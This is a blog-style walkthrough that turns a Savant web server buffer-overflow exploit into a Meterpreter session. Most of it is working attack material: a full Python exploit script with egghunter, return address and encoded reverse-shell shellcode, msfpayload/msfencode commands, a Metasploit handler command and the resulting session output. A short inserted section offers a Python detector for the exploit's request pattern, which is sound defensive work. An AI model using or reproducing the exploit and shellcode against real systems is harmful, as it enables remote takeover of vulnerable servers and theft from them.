Wednesday, January 11, 2012

Savant 0day to Meterpreter

In the previous discussion, From Bug to 0day: EggHunter vs Savant, we ended up with a 0day script like this:

Code:

#!/usr/bin/python
# Python 2: str literals are raw bytes, which is what socket.send() expects here.
import socket

target_address = "192.168.1.6"
target_port = 80

# Egg tag repeated twice; the egghunter in badbuffer scans memory for it.
buffer2 = "R0cX" + "R0cX"
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.8 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
buffer2 += ("\xda\xd1\xba\x00\x2d\x36\x8b\xd9\x74\x24\xf4\x58\x33\xc9\xb1""\x63\x31\x50\x1a\x03\x50\x1a\x83\xe8\xfc\xe2\xf5\x97\xf7\x4b""\x64\xd5\x2e\x8c\x5f\x6e\xf5\xe7\x01\xbe\x3c\xb6\xe0\xf1\xe8""\xab\x99\x34\x10\xcf\x0a\x76\x6a\x08\x9c\xdc\x7f\x34\xea\x5b""\x5b\x52\xd0\x86\x97\x76\xd7\x1c\xdd\xcb\xb5\x32\x9c\xf2\x7b""\x1d\xe3\x4e\xaa\xad\x18\xa8\x0c\x13\xdb\x5d\x75\x59\xc7\xb4""\xdf\x57\xa7\x21\x15\x7b\x1d\x3a\x94\xc4\x78\x82\x94\x0c\x7e""\x2a\x03\xb5\x61\x96\xde\x43\x1f\xb0\x50\xc9\xef\xd4\xc0\xe3""\x25\xd6\xc3\x3f\xdf\xe4\xa7\x6a\x8c\x7a\xbe\x71\x46\xe8\x3c""\xb8\x64\x4c\xbc\x81\xd7\x73\x6a\x1d\x17\x71\x12\x78\x18\x1a""\xa5\x85\x6d\x6d\x92\xb1\x15\x06\x6a\xf4\x47\xab\xfd\x8e\x71""\xb1\xb9\xd8\x56\x9a\x3a\xc8\x13\x73\xc7\xac\xae\x62\xeb\xf8""\x35\x2f\x20\xa0\x8a\xe2\xa4\x1d\x65\x01\x18\x30\xca\x7a\x17""\x5b\xfa\x55\xb7\x9d\xf2\xee\x59\x21\x7f\x78\x72\x9e\x11\xa0""\xdc\xb9\x76\x29\x41\x84\x96\x22\x41\x71\x86\x42\x37\x1a\xcb""\x58\xd9\x21\x25\x85\x86\x6c\x7a\x70\xb3\x8c\xbb\x60\xae\xbe""\x10\x4d\x36\x35\xf0\xdd\x5e\x4a\x79\x03\xb9\x99\x81\x96\xe2""\xc6\xeb\x87\x2d\x97\x17\x94\x34\x0d\x31\x14\x33\xf8\x98\x09""\x42\x09\xb8\x03\xf1\x7b\x2f\x23\xb0\xf2\xdd\x7e\x8c\x49\x48""\x03\xac\x5a\xeb\xb8\xd1\x9e\x78\x91\x4a\x8b\x2c\x13\x8c\x07""\xaf\x70\x3d\x3f\x4b\xf7\x54\x46\x1e\x23\x4e\x6c\xb0\x41\x7c""\x0b\x90\x84\x9e\x7e\xf5\xa7\x74\x63\xf8\x33\x12\xd5\xb5\xa5""\xb4\xce\xe5\xab\xd9\x13\x11\x8d\xda\x30\xb2\x8e\xc8\x85\x72""\x4f\x2e\x80\xc1\x74\xb8\x0a\xcc\xdd\xda\x0f\x97\xdd\xbc\xa8""\xb8\x52\x80\x59\x97\xda\x2a\xb3\x0e\x32\x02\x5a\x54\xb3\xc6""\xd3\xe6\xd9\x1c\x9e\xb8\x54\x81\x7b\xbb\x20\x79\x26\x62\x00""\xc7\x57\xb1\xdf\x48\xb8\xd6\xc4\xde\xeb\x3d\xc7\xee\x8c\x49""\xa7\x39\xc4\xf4\x88\x4f\x31\x13\xd0\x31\xec\x9f\x14\x84\x89""\xa1\x2d")

# Egghunter searching for R0cX, padded with NOPs to 254 bytes, then the return address.
badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
badbuffer += "\x90" * (254 - len(badbuffer))
badbuffer += "\x09\x1D\x40"  # EIP overwrite: 00401D09 in savant.exe, POP EBP; RETN
httpmethod = "\xb0\x03\x04\x01\x7B\x14"  # MOV AL, 3; ADD AL, 1; JPO 14

sendbuf = httpmethod + " /%" + badbuffer + "\r\n\r\n" + buffer2
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(sendbuf)
sock.close()

With this script we can reach the victim's command prompt. So how do we use it to get a Meterpreter session instead?

Very easy. We only need to replace the shell_reverse_tcp payload in buffer2 += (...) with a meterpreter/reverse_tcp one.

To generate the meterpreter/reverse_tcp shellcode we will use msfpayload and msfencode, and a text editor to edit our 0day script.

Preparation:
[*] msfpayload
[*] msfencode
[*] text editor

Walkthrough:

1. Generating the windows/meterpreter/reverse_tcp shellcode

Open a terminal and enter the command:

Code:
root@revolution:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c

Notes:
1. We will use the windows/meterpreter/reverse_tcp shellcode
2. LHOST is my IP address
3. LPORT can be any value you like
4. We will use the x86/shikata_ga_nai encoder
5. Encoding is done 4 times
6. Then the resulting shellcode is printed (as a C string, -t c)

The result:



Code:
root@revolution:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
unsigned char buf[] = "\xd9\xca\xbf\x15\x32\x9c\xb6\xd9\x74\x24\xf4\x5d\x33\xc9\xb1""\x5d\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\xe0\x8d\xfc\x33""\x22\x11\x25\xf9\xeb\xa1\xf2\x0a\x53\x61\x32\x43\x34\x44\xbc""\xb6\xb9\xde\x2e\x34\x1d\x9f\x85\x2c\xa7\xf8\xad\x81\xb0\x7d""\x90\x1a\x5d\x6f\x81\xbc\x1b\x1f\x36\x74\xd6\x77\xa5\xe1\x70""\xf8\x4a\x5a\xef\x48\xc7\x84\x9c\x3a\x5e\x22\x2d\x58\xbc\xf1""\x22\xfb\xe6\x84\xba\xe1\xb1\x38\xd4\x47\xd5\x3a\x02\x6d\x4a""\x76\xcf\xec\xdb\x86\x8b\x4a\xd0\x44\xb0\x32\xfc\x3d\xa6\xb4""\x18\xf0\x3d\x80\x4e\x88\x36\xab\x50\xba\xa2\xc7\x1f\xea\xb6""\x2f\x96\x89\xe4\x90\xe2\x4b\x93\x8a\xe3\x46\x42\x65\x0a\x93""\xc3\x36\x65\x45\x7c\x5d\x3b\x27\x6b\x23\x01\x8c\x5b\xf0\x02""\x49\xbb\xef\x51\x3e\x8a\x9f\xdd\xb5\xb6\xcb\xa2\x5b\x01\x25""\x43\x4e\x22\xd6\x6c\x1d\x5a\xbb\x3c\x84\xc9\xfc\x58\x66\x99""\x20\xd3\xfb\xc1\x1f\x9a\x6a\x21\x2d\x8b\x3d\xcf\x23\x27\xad""\x90\xda\xf1\xe4\x63\x81\x30\xd4\x8f\x14\xaa\xfc\xb2\x5a\xbd""\x29\x6d\xdd\xe0\x8d\x38\x92\xeb\x5c\xdf\x35\xf8\xa7\x33\xe3""\x0c\x34\x62\x9c\x80\xd9\x64\x16\x6d\xcd\x43\x9c\x3d\x8b\x6b""\xd9\x28\xca\x5f\x81\xb4\xe1\xe6\x11\xc6\x5d\xcb\x6f\x2c\xe1""\xe7\xe4\x41\xba\x19\x1c\x5c\x77\x6a\x9e\xd0\x47\xf6\x30\x09""\xe1\xf9\x38\x44\x4e\xdf\xe7\xf3\x1f\xc4\xe0\xed\xd4\x80\x46""\xef\x3a\xa1\x09\xd6\xfd\x5d\x80\x94\x31\x18\x4f\xef\x72\x33""\x77\xcf\xfa\x51\xef\xf9\xfb\xae\x2f\x92\xfb\xff\x5c\x8d\x69""\x35\xf9\x6b\xc7\xa6\x64\x39\xca\x85\x39\x56\x26\x94\xb7\xf7""\x22\x9d\x0d\x8c\x55\x08\x24\x98\x06\x26\xb0\x5c\x72\x9c\x2c""\x7b\x2c\x31\xfd\x0d\xac\xa0\x5f\x19\x8d\xca\xbf\xca\x22\x83""\x35\x17\xe4\x1d\x7f\xa4\x9a\xe2\x05\xc0\x2b\xdb\x39\x55\x80""\x12\xe8\xbe\x54\xd3\x62\xba\x06"


2. Modifying the 0day script

Then insert the shellcode above, so that our 0day script becomes:

Code:
#!/usr/bin/python
# Python 2: str literals are raw bytes, which is what socket.send() expects here.
import socket

target_address = "172.16.230.128"
target_port = 80

# Egg tag repeated twice; the egghunter in badbuffer scans memory for it.
buffer2 = "R0cX" + "R0cX"
# msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c
buffer2 += ("\xbb\xc4\x86\x09\x6a\xda\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1""\x5d\x31\x5f\x15\x83\xef\xfc\x03\x5f\x11\xe2\x31\x3e\xd8\x1a""\x43\x1f\x01\x06\x6a\x14\x91\x43\xd2\xe6\x10\x1a\xbd\x8b\x4d""\xa1\x70\xca\x9f\x59\xe5\xac\x87\x88\xa6\xcd\xbb\x8d\x85\x54""\xce\xe8\x40\xbc\x43\xca\xac\x6b\x68\x6a\xe9\x04\x50\xb7\x7b""\x48\x92\xbe\x13\x3f\xf4\x81\xf5\xe7\xe0\x0f\x72\xb9\xb0\x42""\xf2\x40\x64\xf3\xce\x54\xcd\x67\x4c\xe2\x4c\x49\xdc\x37\x0b""\xd5\x7c\x79\xbc\x30\xff\x46\x31\x68\xd8\x74\xc2\xc0\xd6\xee""\xec\x5f\x0e\x9e\x2b\xf1\xc8\x3f\xb5\x44\xbe\x12\x41\x94\xe8""\xe9\xca\x45\x9f\x6f\x52\x9b\x89\x99\x54\x4c\x22\xbf\x81\xae""\xdf\x7b\xed\x36\x47\x4f\x37\x91\x87\x67\x84\x1b\xc7\xe8\x8e""\x6b\xb5\x09\xe6\x1e\x95\x64\xb6\x06\x50\xfc\xe4\x3b\x65\x40""\x0a\xc8\x8a\x52\x03\xf2\xd9\x97\x32\x3f\xbd\xbe\x60\x35\x8d""\x21\x9f\x55\x47\x93\x3f\x4a\x8e\x3d\x3c\x5d\xeb\xe4\x70\xd1""\xb0\x0b\xa7\x96\x87\xf8\x26\x48\x3c\x5d\x79\x8d\x1c\xa3\xf6""\xd4\x71\x35\xdd\x06\x06\xca\x2e\x54\x64\x15\x5d\xb9\xe7\x88""\x91\xb0\x62\x1c\xd1\xbd\x5c\x9c\x64\x71\xd4\xab\xe7\x01\x4d""\x68\x44\xa4\xd3\xa3\x2f\x3b\xf4\xdf\x6f\x69\x74\xb5\xf0\xb4""\x33\x69\xed\xc8\xad\xd9\xec\x09\xbe\x02\xb6\xaa\xfd\xcd\x10""\x20\x11\xc5\xf8\x39\x4b\xff\x9e\x18\xb6\xb5\xe0\xed\x37\xa1""\x34\xef\xbb\xae\x05\x1a\x41\x72\x4d\xcc\x60\x61\xb4\xf1\x48""\xc7\x84\x95\x93\xf3\xc4\x88\x1e\xa2\x12\xc5\x39\xfb\x64\x48""\xfa\xb0\x8a\xd1\x2a\x5e\xc7\x4d\x59\xaf\x70\xf8\x34\xa8\x05""\xa8\xa2\x4b\xde\x06\x42\xcb\x17\x30\xd6\x4b\x83\x5c\xc6\x70""\x94\xe4\x22\xf5\x5a\x84\x60\x4d\xed\x4a\xae\x60\x54\x2a\x03""\x20\xb3\x14\xd6\xe9\xae\x15\x84\x7c\xea\x4b\x73\xa8\x1c\x85""\x6c\x22\xe1\x4d\x84\xfd\x3f\x95")

# Egghunter searching for R0cX, padded with NOPs to 254 bytes, then the return address.
badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
badbuffer += "\x90" * (254 - len(badbuffer))
badbuffer += "\x09\x1D\x40"  # EIP overwrite: 00401D09 in savant.exe, POP EBP; RETN
httpmethod = "\xb0\x03\x04\x01\x7B\x14"  # MOV AL, 3; ADD AL, 1; JPO 14

sendbuf = httpmethod + " /%" + badbuffer + "\r\n\r\n" + buffer2
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(sendbuf)
sock.close()

Notes:
1. Change target_address to the victim's IP address
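Seen from the defending side, the request this script builds has features a web server log monitor or IDS can flag without knowing anything about the shellcode: a method made of raw opcode bytes instead of an ASCII token, a URI padded out to 254 bytes with NOPs, and an egg tag repeated twice right before the payload. The detector below is an added example, not code from the original post; its sample requests are constructed, reuse only the request layout shown above, and carry filler bytes in place of shellcode.

```python
import re

NOP_SLED_MIN = 32     # consecutive 0x90 bytes before we call it a sled
MAX_URI_LEN = 200     # the Savant overflow needs about 254 bytes after " /%"
METHOD_TOKEN = re.compile(rb"[A-Z]{3,10}")


def analyze_request(raw):
    """Inspect one raw HTTP request (bytes) and return a list of findings."""
    findings = []
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ", 2)
    method = parts[0]
    uri = parts[1] if len(parts) > 1 else b""

    # 1. A real method is a short token of ASCII letters; x86 opcodes are not.
    if not METHOD_TOKEN.fullmatch(method):
        findings.append("non-token HTTP method: %s" % method.hex())

    # 2. The overflow is triggered by an oversized URI, so length alone is a signal.
    if len(uri) > MAX_URI_LEN:
        findings.append("oversized URI (%d bytes)" % len(uri))

    # 3. A long run of 0x90 is a NOP sled; the script pads its buffer to 254 bytes with it.
    m = re.search(rb"\x90{%d,}" % NOP_SLED_MIN, raw)
    if m:
        findings.append("NOP sled of %d bytes" % (m.end() - m.start()))

    # 4. Egghunter layout: a printable 4-byte tag repeated twice ("R0cX" + "R0cX"),
    #    immediately followed by mostly non-printable bytes (the real payload).
    m = re.search(rb"([A-Za-z0-9]{4})\1", body)
    if m:
        tail = body[m.end():]
        binary = sum(1 for b in tail if b < 0x20 or b > 0x7e)
        if len(tail) >= 16 and binary * 2 >= len(tail):
            findings.append("doubled egg tag %r before %d payload bytes" % (m.group(1), len(tail)))
    return findings


# Constructed samples (not traffic from the original post). ATTACK copies the
# method bytes and return address from the script above but uses filler bytes
# instead of the egghunter and shellcode.
BENIGN = b"GET /index.html HTTP/1.0\r\nHost: 172.16.230.128\r\n\r\n"
ATTACK = (b"\xb0\x03\x04\x01\x7b\x14" + b" /%" + b"\x90" * 254 + b"\x09\x1d\x40"
          + b"\r\n\r\n" + b"R0cX" + b"R0cX" + bytes(range(0x80, 0xc0)))

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("attack", ATTACK)):
        print(name, analyze_request(req) or "clean")
```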

Open a terminal and enter the command:

Code:
root@revolution:~/Desktop# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 E

Notes:
1. LHOST is your IP address
2. LPORT must be the same LPORT used when generating the shellcode in step one


3. Sending our buffer

Then we run the 0day script against the victim:

Code:
root@revolution:~/Desktop# python 0day.py




4. Game Over

Wait a moment until our Metasploit handler receives the stager's connection.

Code:
root@revolution:~/Desktop# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.230.1 LPORT=4444 E
[*] Please wait while we load the module tree...


       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 423 auxiliary - 127 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14537 updated today (2012.01.10)

PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 172.16.230.1
LPORT => 4444
[*] Started reverse handler on 172.16.230.1:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 172.16.230.128
[*] Meterpreter session 1 opened (172.16.230.1:4444 -> 172.16.230.128:1039) at 2012-01-11 17:38:16 +0700
meterpreter >

Success. After checking the process working directory, I am inside the Savant directory, where Savant suffered the buffer overflow.



Code:
meterpreter > pwd
C:\Savant
root@revolution

Excellent as usual =)

created by red-dragon
